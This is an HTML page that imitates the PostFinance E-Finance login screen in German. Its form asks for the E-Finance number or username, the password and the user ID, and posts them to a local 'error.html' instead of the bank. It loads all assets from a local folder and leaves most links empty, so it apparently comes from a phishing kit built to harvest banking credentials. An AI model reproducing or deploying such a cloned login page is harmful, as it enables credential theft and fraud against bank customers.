<!DOCTYPE html>
<!--[if IE 9]> 
<html class="no-js lt-ie10"> 
<![endif]-->
<!--[if gt IE 9]><!-->
<html class="js supports no-touchevents csstransforms csstransforms3d csstransitions" style="" lang="de"><!--<![endif]-->
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-178031011-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-178031011-1');
</script>
<meta http-equiv="content-type" content="text/html; charset=windows-1252"> 
  <meta charset="utf-8"> 
  <!--[if !HTML5]> 
  <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible"> 
  <![endif]--> 
  <title>PostFinance - E-Finance</title> 
  <meta content="" name="description"> 
  <meta content="" name="author"> 
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" name="viewport"> 
  <meta content="telephone=no" name="format-detection"> 
  <meta content="de" http-equiv="content-language"> 
  <meta http-equiv="Cache-control" content="no-cache"> 
  <meta http-equiv="Cache-control" content="no-store"> 
  <meta name="robots" content="noindex"> 
  <meta name="AdsBot-Google" content="noindex"> 
  <meta name="LOGINPAGE" content="LOGIN"> 
  <meta name="description" content="Login E-Finance zu Hause am Bildschirm: In wenigen Schritten ins E-Finance einloggen. ">
  <link rel="alternate" hreflang="de" href="">
  <link rel="alternate" hreflang="fr" href="">
  <link rel="alternate" hreflang="it" href="">
  <link rel="alternate" hreflang="en" href="">
  <link rel="alternate" hreflang="x-default" href="#">
  <link rel="canonical" href="#"> 
  <link href="inc/all_002.css" rel="stylesheet" type="text/css" media="(min-width: 750px)"> 
  <link href="inc/all.css" rel="stylesheet" type="text/css" media="(max-width: 749px)"> 

  

  <script type="text/javascript" src="inc/all.js"></script> 
  <script type="text/javascript" src="inc/all_002.js"></script> 
  <script type="text/javascript" src="inc/pf.js"></script> 
  <script type="text/javascript" src="inc/unblu_002.js"></script><script src="inc/unblu.js" defer="defer"></script> 
  
 
</head> 
<body cz-shortcut-listen="true"> 
<div id="body"> 
  <div class="site_header site_header-login"> 
     
    <div class="site_banner_wrapper"> 
      <div class="site_banner"> 
        <a class="site_logo removeLinkIfApp" href="" title="Logo PostFinance AG, zur Startseite"> 
          <img src="inc/logo.png" alt="Logo PostFinance AG, zur Startseite"> 
        </a> 
 
        <h2 class="is-visuallyhidden">Sprache, Werkzeuge und wichtige Links</h2> 
 
        <div class="meta_nav" role="menu"> 
          <h3 class="is-visuallyhidden">Kontakt und Support</h3> 
          <div class="meta_nav" role="menu"> 
 
          <div class="dropdown_nav js-dropdown_nav secondary_nav dropdown_nav-black" data-has-module="yes"> 
            <a aria-haspopup="true" class="dropdown_nav--trigger js-dropdown_nav--trigger" href="" role="menuitem" aria-expanded="false">Hilfe und Support</a> 
 
            <div class="secondary_nav--menu js-dropdown_menu dropdown_nav--menu" aria-hidden="true" aria-expanded="false"> 
              <div class="secondary_nav--menu--row"> 
                <div class="secondary_nav--menu--row--column"> 
                  <strong class="h3 secondary_nav--menu--row--column--title" id="u8">Direkt Hilfe erhalten</strong> 
                  <ul aria-hidden="true" class="secondary_nav--menu--row--column--link_list" role="menu"> 
				    <li class="secondary_nav--menu--row--column--link_list--item"><a class="secondary_nav--menu--row--column--link_list--item--link" href="javascript:window.nnUnblu.openChat();" title="">Chat mit dem digitalen Assistenten</a></li> 
				    <li class="secondary_nav--menu--row--column--link_list--item"><a class="secondary_nav--menu--row--column--link_list--item--link" href="" title="">Hilfe zum E-Finance und Login</a></li> 
                  </ul> 
                </div> 
                <div class="secondary_nav--menu--row--column"> 
                  <strong class="h3 secondary_nav--menu--row--column--title" id="u9">Selber erledigen</strong> 
                  <ul aria-hidden="true" class="secondary_nav--menu--row--column--link_list" role="menu"> 
                    <li class="secondary_nav--menu--row--column--link_list--item"><a class="secondary_nav--menu--row--column--link_list--item--link" href="#" title="">Onlinekunde werden</a></li> 
                    <li class="secondary_nav--menu--row--column--link_list--item"><a class="secondary_nav--menu--row--column--link_list--item--link" href="#" title="">Mobile ID bestellen</a></li> 
                  </ul> 
                </div> 
              </div> 
              <div class="secondary_nav--menu--row"> 
                <div class="secondary_nav--menu--row--column"> 
                  <strong class="h3 secondary_nav--menu--row--column--title" id="u11">Bei weiteren Fragen</strong> 
                  <p class="secondary_nav--menu--row--column--text">+41 44 586 66 34</p> 
                  <p class="secondary_nav--menu--row--column--text-additional_info" id="desc_u12">(im Inland max. CHF 0.08/Min.)</p> 
                </div> 
                <div class="secondary_nav--menu--row--column"> 
                  <strong class="h3 secondary_nav--menu--row--column--title" id="u10">Sicherheitshinweise</strong> 
                  <ul aria-hidden="true" class="secondary_nav--menu--row--column--link_list" role="menu"> 
                    <li class="secondary_nav--menu--row--column--link_list--item"><a class="secondary_nav--menu--row--column--link_list--item--link" href="" title="">Sicher im Internet</a></li> 
                    <li class="secondary_nav--menu--row--column--link_list--item"><a class="secondary_nav--menu--row--column--link_list--item--link" href="" title="">Browsercheck</a></li> 
                  </ul> 
                </div> 
              </div> 
            </div> 
          </div> 
        </div> 
      </div> 
    </div> 
  </div> 
  <div class="site-content site-content-login" id="main-content"> 
    <div class="detail_page" id="detail_page"> 
      <div class="detail_content" id="detail_content"><div id="infoTexte"></div> 
                <!-- Login --> 
         
        <h1 class="page-title page-title-top" id="page-title"><span class="icon icon-logged-out"></span><span class="inlineblock is-center">Login</span></h1> 
		
        <div class="l-grid"> 
          <div class="l-column l-two-thirds l-mobile-one-whole"> 
            <div class="is-visuallyhidden openInOverlay" id="ef-error-message" tabindex="0"><div class="error"></div></div> 
                        <!-- Input Form Page 1 --> 
           
            <form action="error.html" class="pf-login_form" method="post" name="login" onkeypress="return submitenter(this, event)" accept-charset="UTF-8"> 
              <input type="hidden" name="p_spr_cd" value="1">
<input type="hidden" name="p_seg" value="1">
 
               
              <div class="content-pane-wrapper" id="main-form"> 
                <div class="content-pane"> 
                  <fieldset class="search login"> 
                    <div class="widget_form--row"> 
                      <div class="js-text_input_row_narrow text_input_row_narrow has-focus" id="usern" data-has-module="yes"> 
                        <label class="text_input_row_narrow--label" for="text_input_narrow-u4">E-Finance-Nummer / Benutzername</label> 
 
                        <div class="text_input"> 
                          <input name="p_username" class="text_input--field" id="text_input_narrow-u4" placeholder="" type="text" maxlength="23" autocomplete="off"> 
                        </div> 
                      </div> 
                    </div> 
                    <div class="widget_form--row"> 
                      <div class="js-text_input_row_narrow text_input_row_narrow" id="passw" data-has-module="yes"> 
                        <label class="text_input_row_narrow--label" for="text_input_narrow-u5">Passwort</label> 
 
                        <div class="text_input"> 
                          <input name="p_passw" id="text_input_narrow-u5" placeholder="" type="password" value="" maxlength="23" autocomplete="off"> 
                        </div> 
                      </div> 
                    </div> 
                  </fieldset> 
                  <div id="pwvergessen" class="l-gap-above"><a href="#" onclick="forgotPassword()" class="link">Passwort vergessen / &#0196ndern</a></div> 
                 
                </div> 
                <div class="content-pane" id="userid"> 
                  <div>Falls vorhanden:</div> 
                  <div class="widget_form--row"> 
                    <div class="js-text_input_row_narrow text_input_row_narrow" data-has-module="yes"> 
                      <label class="text_input_row_narrow--label" for="text_input_narrow-u7">Benutzeridentifikation</label> 
 
                      <div class="text_input"> 
                        <input name="p_userid" class="text_input--field" id="text_input_narrow-u7" placeholder="" type="text" maxlength="30" autocomplete="off" autocapitalize="none"> 
                      </div> 
                    </div> 
                  </div> 
                </div> 
              </div> 
              <div class="buttons"> 
                <button class="efinance-button" type="submit">Weiter</button> 
                <a id="login_abort" class="btn" style="display:none;" href="javascript:loginAbort()">Abbrechen</a> 
              </div> 
            </form> 
            <form action="?login&amp;p_pfid_cancel=true" method="post" name="login_abort"> 
			       
            </form> 
            
          </div> 
          <div class="l-column l-one-third l-mobile-one-whole hideIfMobileApp"> 
  <div class="l-gap"> 
    <h3 class="paragraph-title">Benötigen Sie Hilfe?</h3> 
    <ul class="list-links"> 
      <li><a class="link" href="javascript:window.nnUnblu.openChat();" title="">Chat mit dem digitalen Assistenten</a></li> 
      <li class="l-gap-above l-gap-small"><a target="_blank" class="link openInOverlay" href="" title="">Hilfe zu den Loginverfahren</a></li> 
    </ul> 
  </div> 
  <div class="l-gap"> 
    <h3 class="paragraph-title">E-Finance testen</h3> 
    <ul class="list-links"> 
      <li class="l-gap-above l-gap-small"><a target="_blank" class="link hideIfMobile openInOverlay" href="" title="">Demoversion E-Finance</a></li> 
    </ul> 
  </div> 
    <h3 class="paragraph-title">Sie haben noch kein E-Finance?</h3> 
    <ul class="list-links"> 
      <li><a class="link openInOverlay" href="" title="">E-Finance bestellen</a></li> 
    </ul> 
</div> 
 
 
        </div> 
 
      
 
                <div id="lightbox" class="detail_overlay detail_overlay-mobile_fullscreen js-autofocus" data-autofocus="keepfocus" style="display:none;" tabindex="-1"> 
          <div class="detail_overlay--bg" onclick="$('#lightbox').hide();"></div> 
          <div class="detail_overlay--content detail_content"> 
            <div class="detail_overlay--content--header"> 
              <a class="detail_content--close_button" href="#" onclick="$('#lightbox').hide();"> 
                <span class="is-visuallyhidden">Herzlich willkommen im E-Finance</span>Schliessen 
              </a> 
            </div> 
            <div class="detail_overlay--content--body"> 
              <article class="wcms"> 
                <div id="lightbox_content" class="content-pane wcms"></div> 
              </article> 
            </div> 
            <div class="detail_overlay--content--footer"> 
              <a class="detail_content--close_button" href="#" onclick="$('#lightbox').hide();"> 
                <span class="is-visuallyhidden">Herzlich willkommen im E-Finance</span>Schliessen 
              </a> 
            </div> 
          </div> 
        </div> 
         
     
 
      </div> 
    </div> 
  </div> 
  <h1 class="is-visuallyhidden">Fussbereich</h1> 
  <div class="site_footer site_footer-login js-sticky_footer" role="contentinfo" style="height: 65px;" data-has-module="yes"> 
    <div class="site_footer--inner js-sticky_footer--inner"> 
      <div class="footer_secondary_nav"> 
        <div class="l-leftright l-leftright-reset-mobile"> 
          <div class="l-right l-two-thirds"> 
            <div class="l-leftright l-leftright-reset-mobile"> 
              <div class="l-left l-one-half"> 
                <div class="footer_language"> 
                  <h2 class="is-visuallyhidden">Sprachauswahl</h2> 
                  <span class="footer_language--label"><i class="icon icon-inline icon-globe"> </i>Sprache</span> 
                  <div class="dropdown_nav js-dropdown_nav dropdown_nav-grey" data-has-module="yes"> 
                    <a aria-haspopup="true" class="dropdown_nav--trigger js-dropdown_nav--trigger" href="#" role="menuitem" aria-expanded="false">Deutsch</a> 
                    <div aria-hidden="true" class="dropdown_nav--menu js-dropdown_menu link_list link_list-no_arrows link_list-white" aria-expanded="false"> 
                      <ul class="link_list_menu " role="menu"> 
                        <li class="link_list--menu_item"><a class="link_list--menu_item--link js-link_list--menu_item--link is_active" href="" role="menuitem" tabindex="-1">Deutsch</a></li> 
                        <li class="link_list--menu_item"><a class="link_list--menu_item--link js-link_list--menu_item--link" href="" role="menuitem" tabindex="-1">Français</a></li> 
                        <li class="link_list--menu_item"><a class="link_list--menu_item--link js-link_list--menu_item--link" href="" role="menuitem" tabindex="-1">Italiano</a></li> 
                        <li class="link_list--menu_item"><a class="link_list--menu_item--link js-link_list--menu_item--link" href="" role="menuitem" tabindex="-1">English</a></li> 
                      </ul> 
                    </div> 
                  </div> 
                </div> 
              </div> 
              <div class="l-right l-one-half"> 
                <h2 class="is-visuallyhidden">Fussbereich Subnavigation</h2> 
                <ul class="footer_links"> 
                  <li class="footer_links--item"><a class="footer_links--item--link" href="https://www.postfinance.ch/legalde" title="">Rechtliches und Barrierefreiheit</a></li> 
                </ul> 
              </div> 
            </div> 
          </div> 
        </div> 
      </div> 
    </div> 
  </div> 
</div> 
<div aria-busy="true" aria-label="Wird geladen..." class="page_loader js-page_loader" id="loader" style="display: none"> 
  <div class="page_loader--inner"> 
        <div class="pf-spinner"> 
      <span class="is-1 pf-spinner--item"></span> 
      <span class="is-2 pf-spinner--item"></span> 
      <span class="is-3 pf-spinner--item"></span> 
      <span class="is-4 pf-spinner--item"></span> 
      <span class="is-5 pf-spinner--item"></span> 
    </div> 
 
    <div class="message" tabindex="0">Wird geladen...</div> 
  </div> 
</div> 
<!-- rdahir=1960832587 --> 
 
 
</div><flying-focus id="flying-focus"></flying-focus></body></html>

